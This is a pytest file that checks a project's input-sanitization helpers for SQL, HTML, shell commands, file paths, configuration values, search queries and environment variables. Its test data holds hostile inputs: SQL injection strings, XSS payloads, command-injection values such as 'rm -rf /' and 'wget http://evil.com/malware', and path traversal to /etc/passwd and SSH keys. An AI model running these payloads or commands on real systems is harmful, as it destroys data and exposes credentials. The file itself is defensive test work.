trax/tests/test_input_sanitization.py

512 lines
17 KiB
Python

"""Unit tests for input sanitization and secure configuration handling."""
import json
import tempfile
import os
import shutil
from pathlib import Path
from typing import Dict, Any
import pytest
from src.security.input_sanitization import (
sanitize_sql_input,
sanitize_html_input,
sanitize_command_input,
sanitize_file_path,
sanitize_config_value,
validate_config_schema,
sanitize_search_query,
sanitize_environment_variable,
InputSanitizationError,
ConfigValidationError,
)
class TestSQLInputSanitization:
"""Test SQL input sanitization functions."""
def test_sanitize_sql_input_removes_sql_injection(self):
"""Test that SQL injection attempts are sanitized."""
malicious_inputs = [
"'; DROP TABLE users; --",
"' OR '1'='1",
"'; INSERT INTO users VALUES ('hacker', 'password'); --",
"admin'--",
"'; UPDATE users SET password='hacked'; --",
]
for malicious_input in malicious_inputs:
sanitized = sanitize_sql_input(malicious_input)
assert "DROP" not in sanitized
assert "INSERT" not in sanitized
assert "UPDATE" not in sanitized
assert "DELETE" not in sanitized
assert ";" not in sanitized
assert "--" not in sanitized
assert "/*" not in sanitized
assert "*/" not in sanitized
def test_sanitize_sql_input_preserves_safe_input(self):
"""Test that safe input is preserved."""
safe_inputs = [
"normal text",
"user123",
"search query",
"file_name.txt",
"path/to/file",
]
for safe_input in safe_inputs:
sanitized = sanitize_sql_input(safe_input)
assert sanitized == safe_input
def test_sanitize_sql_input_handles_edge_cases(self):
"""Test edge cases for SQL input sanitization."""
# Empty input
assert sanitize_sql_input("") == ""
assert sanitize_sql_input(None) == ""
# Whitespace only
assert sanitize_sql_input(" ") == " "
# Very long input
long_input = "a" * 1000
sanitized = sanitize_sql_input(long_input)
assert len(sanitized) <= 1000
def test_sanitize_sql_input_raises_error_for_critical_attacks(self):
"""Test that critical SQL injection attempts raise errors."""
critical_attacks = [
"'; DROP DATABASE; --",
"'; SHUTDOWN; --",
"'; EXEC xp_cmdshell; --",
]
for attack in critical_attacks:
with pytest.raises(InputSanitizationError):
sanitize_sql_input(attack)
class TestHTMLInputSanitization:
"""Test HTML input sanitization functions."""
def test_sanitize_html_input_removes_xss_attempts(self):
"""Test that XSS attempts are sanitized."""
xss_attempts = [
"<script>alert('xss')</script>",
"<img src=x onerror=alert('xss')>",
"javascript:alert('xss')",
"<iframe src='http://evil.com'></iframe>",
"<svg onload=alert('xss')>",
]
for xss_attempt in xss_attempts:
sanitized = sanitize_html_input(xss_attempt)
assert "<script>" not in sanitized
assert "javascript:" not in sanitized
assert "onerror=" not in sanitized
assert "onload=" not in sanitized
assert "<iframe" not in sanitized
def test_sanitize_html_input_preserves_safe_html(self):
"""Test that safe HTML is preserved."""
safe_html = [
"<p>Normal paragraph</p>",
"<strong>Bold text</strong>",
"<em>Italic text</em>",
"<a href='https://example.com'>Link</a>",
]
for html in safe_html:
sanitized = sanitize_html_input(html)
# Should preserve the original tag
if "<p>" in html:
assert "<p>" in sanitized
elif "<strong>" in html:
assert "<strong>" in sanitized
elif "<em>" in html:
assert "<em>" in sanitized
elif "<a>" in html:
assert "<a>" in sanitized
def test_sanitize_html_input_handles_edge_cases(self):
"""Test edge cases for HTML input sanitization."""
# Empty input
assert sanitize_html_input("") == ""
assert sanitize_html_input(None) == ""
# Plain text
assert sanitize_html_input("plain text") == "plain text"
# Mixed content
mixed = "Normal text <script>alert('xss')</script> more text"
sanitized = sanitize_html_input(mixed)
assert "<script>" not in sanitized
assert "Normal text" in sanitized
assert "more text" in sanitized
class TestCommandInputSanitization:
"""Test command input sanitization functions."""
def test_sanitize_command_input_removes_command_injection(self):
"""Test that command injection attempts are sanitized."""
injection_attempts = [
"file.txt; rm -rf /",
"file.txt && rm -rf /",
"file.txt | rm -rf /",
"file.txt; cat /etc/passwd",
"file.txt; wget http://evil.com/malware",
]
for attempt in injection_attempts:
sanitized = sanitize_command_input(attempt)
assert ";" not in sanitized
assert "&&" not in sanitized
assert "|" not in sanitized
assert "rm -rf" not in sanitized
assert "cat /etc" not in sanitized
assert "wget" not in sanitized
def test_sanitize_command_input_preserves_safe_commands(self):
"""Test that safe command input is preserved."""
safe_commands = [
"file.txt",
"path/to/file",
"filename with spaces.txt",
"file-name_123.txt",
]
for command in safe_commands:
sanitized = sanitize_command_input(command)
assert sanitized == command
def test_sanitize_command_input_handles_edge_cases(self):
"""Test edge cases for command input sanitization."""
# Empty input
assert sanitize_command_input("") == ""
assert sanitize_command_input(None) == ""
# Whitespace only
assert sanitize_command_input(" ") == " "
class TestFilePathSanitization:
"""Test file path sanitization functions."""
def test_sanitize_file_path_removes_dangerous_paths(self):
"""Test that dangerous file paths are sanitized."""
dangerous_paths = [
"../../../etc/passwd",
"/etc/passwd",
"/root/.ssh/id_rsa",
"C:\\Windows\\System32\\config\\SAM",
"~/.ssh/id_rsa",
]
for path in dangerous_paths:
sanitized = sanitize_file_path(path)
assert ".." not in sanitized
assert "/etc/" not in sanitized
assert "/root/" not in sanitized
assert "System32" not in sanitized
assert ".ssh" not in sanitized
def test_sanitize_file_path_preserves_safe_paths(self):
"""Test that safe file paths are preserved."""
safe_paths = [
"file.txt",
"path/to/file.txt",
"subdirectory/file.txt",
"file with spaces.txt",
]
for path in safe_paths:
sanitized = sanitize_file_path(path)
assert sanitized == path
def test_sanitize_file_path_handles_edge_cases(self):
"""Test edge cases for file path sanitization."""
# Empty input
assert sanitize_file_path("") == ""
assert sanitize_file_path(None) == ""
# Current directory
assert sanitize_file_path(".") == "."
assert sanitize_file_path("./file.txt") == "./file.txt"
class TestConfigValueSanitization:
"""Test configuration value sanitization functions."""
def test_sanitize_config_value_validates_types(self):
"""Test that configuration values are properly typed."""
# String values
assert sanitize_config_value("string", str) == "string"
assert sanitize_config_value("123", str) == "123"
# Integer values
assert sanitize_config_value("123", int) == 123
assert sanitize_config_value(123, int) == 123
# Boolean values
assert sanitize_config_value("true", bool) is True
assert sanitize_config_value("false", bool) is False
assert sanitize_config_value(True, bool) is True
# Float values
assert sanitize_config_value("123.45", float) == 123.45
assert sanitize_config_value(123.45, float) == 123.45
def test_sanitize_config_value_handles_invalid_types(self):
"""Test that invalid types raise errors."""
with pytest.raises(ConfigValidationError):
sanitize_config_value("not_a_number", int)
with pytest.raises(ConfigValidationError):
sanitize_config_value("not_a_bool", bool)
with pytest.raises(ConfigValidationError):
sanitize_config_value("not_a_float", float)
def test_sanitize_config_value_enforces_bounds(self):
"""Test that configuration values respect bounds."""
# Integer bounds
assert sanitize_config_value("50", int, min_value=0, max_value=100) == 50
with pytest.raises(ConfigValidationError):
sanitize_config_value("-1", int, min_value=0, max_value=100)
with pytest.raises(ConfigValidationError):
sanitize_config_value("101", int, min_value=0, max_value=100)
# Float bounds
assert sanitize_config_value("0.5", float, min_value=0.0, max_value=1.0) == 0.5
with pytest.raises(ConfigValidationError):
sanitize_config_value("-0.1", float, min_value=0.0, max_value=1.0)
def test_sanitize_config_value_handles_edge_cases(self):
"""Test edge cases for configuration value sanitization."""
# None values
with pytest.raises(ConfigValidationError):
sanitize_config_value(None, str)
# Empty strings
with pytest.raises(ConfigValidationError):
sanitize_config_value("", str)
class TestConfigSchemaValidation:
"""Test configuration schema validation functions."""
def test_validate_config_schema_validates_required_fields(self):
"""Test that required fields are validated."""
schema = {
"type": "object",
"required": ["api_key", "base_url"],
"properties": {
"api_key": {"type": "string"},
"base_url": {"type": "string"},
"timeout": {"type": "integer", "default": 30}
}
}
valid_config = {
"api_key": "secret_key",
"base_url": "https://api.example.com"
}
# Should not raise error
validate_config_schema(valid_config, schema)
# Missing required field should raise error
invalid_config = {"api_key": "secret_key"}
with pytest.raises(ConfigValidationError):
validate_config_schema(invalid_config, schema)
def test_validate_config_schema_validates_field_types(self):
"""Test that field types are validated."""
schema = {
"type": "object",
"properties": {
"timeout": {"type": "integer"},
"enabled": {"type": "boolean"},
"url": {"type": "string"}
}
}
valid_config = {
"timeout": 30,
"enabled": True,
"url": "https://example.com"
}
# Should not raise error
validate_config_schema(valid_config, schema)
# Invalid type should raise error
invalid_config = {
"timeout": "not_a_number",
"enabled": True,
"url": "https://example.com"
}
with pytest.raises(ConfigValidationError):
validate_config_schema(invalid_config, schema)
def test_validate_config_schema_handles_nested_objects(self):
"""Test that nested objects are validated."""
schema = {
"type": "object",
"properties": {
"database": {
"type": "object",
"properties": {
"host": {"type": "string"},
"port": {"type": "integer"}
}
}
}
}
valid_config = {
"database": {
"host": "localhost",
"port": 5432
}
}
# Should not raise error
validate_config_schema(valid_config, schema)
# Invalid nested type should raise error
invalid_config = {
"database": {
"host": "localhost",
"port": "not_a_number"
}
}
with pytest.raises(ConfigValidationError):
validate_config_schema(invalid_config, schema)
class TestSearchQuerySanitization:
"""Test search query sanitization functions."""
def test_sanitize_search_query_removes_sql_injection(self):
"""Test that search queries are protected from SQL injection."""
malicious_queries = [
"'; DROP TABLE users; --",
"' OR '1'='1",
"admin'--",
]
for query in malicious_queries:
sanitized = sanitize_search_query(query)
assert "DROP" not in sanitized
assert "OR" not in sanitized
assert "--" not in sanitized
def test_sanitize_search_query_preserves_safe_queries(self):
"""Test that safe search queries are preserved."""
safe_queries = [
"transcription",
"audio file",
"podcast episode",
"lecture notes",
]
for query in safe_queries:
sanitized = sanitize_search_query(query)
assert sanitized == query
def test_sanitize_search_query_handles_special_characters(self):
"""Test that special characters are handled properly."""
queries_with_special_chars = [
"file-name.txt",
"path/to/file",
"file with spaces",
"file@domain.com",
]
for query in queries_with_special_chars:
sanitized = sanitize_search_query(query)
# Should preserve most special characters but remove dangerous ones
assert ";" not in sanitized
assert "--" not in sanitized
class TestEnvironmentVariableSanitization:
"""Test environment variable sanitization functions."""
def test_sanitize_environment_variable_removes_dangerous_chars(self):
"""Test that dangerous characters are removed from env var names."""
dangerous_names = [
"PATH; rm -rf /",
"HOME && rm -rf /",
"USER | rm -rf /",
]
for name in dangerous_names:
sanitized = sanitize_environment_variable(name)
assert ";" not in sanitized
assert "&&" not in sanitized
assert "|" not in sanitized
def test_sanitize_environment_variable_preserves_safe_names(self):
"""Test that safe environment variable names are preserved."""
safe_names = [
"API_KEY",
"DATABASE_URL",
"LOG_LEVEL",
"DEBUG_MODE",
]
for name in safe_names:
sanitized = sanitize_environment_variable(name)
assert sanitized == name
def test_sanitize_environment_variable_handles_edge_cases(self):
"""Test edge cases for environment variable sanitization."""
# Empty input
assert sanitize_environment_variable("") == ""
assert sanitize_environment_variable(None) == ""
# Whitespace only
assert sanitize_environment_variable(" ") == " "
class TestInputSanitizationIntegration:
"""Integration tests for input sanitization."""
def test_comprehensive_sanitization_pipeline(self):
"""Test that all sanitization functions work together."""
malicious_input = "'; DROP TABLE users; -- <script>alert('xss')</script>"
# Apply all sanitization functions
sql_safe = sanitize_sql_input(malicious_input)
html_safe = sanitize_html_input(sql_safe)
command_safe = sanitize_command_input(html_safe)
# Should be safe after all sanitization
assert "DROP" not in command_safe
assert "<script>" not in command_safe
assert ";" not in command_safe
assert "--" not in command_safe
def test_sanitization_preserves_legitimate_content(self):
"""Test that legitimate content is preserved through sanitization."""
legitimate_input = "Search for audio files in /path/to/files"
# Apply all sanitization functions
sql_safe = sanitize_sql_input(legitimate_input)
html_safe = sanitize_html_input(sql_safe)
command_safe = sanitize_command_input(html_safe)
# Should preserve the core content
assert "Search" in command_safe
assert "audio" in command_safe
assert "files" in command_safe
assert "path" in command_safe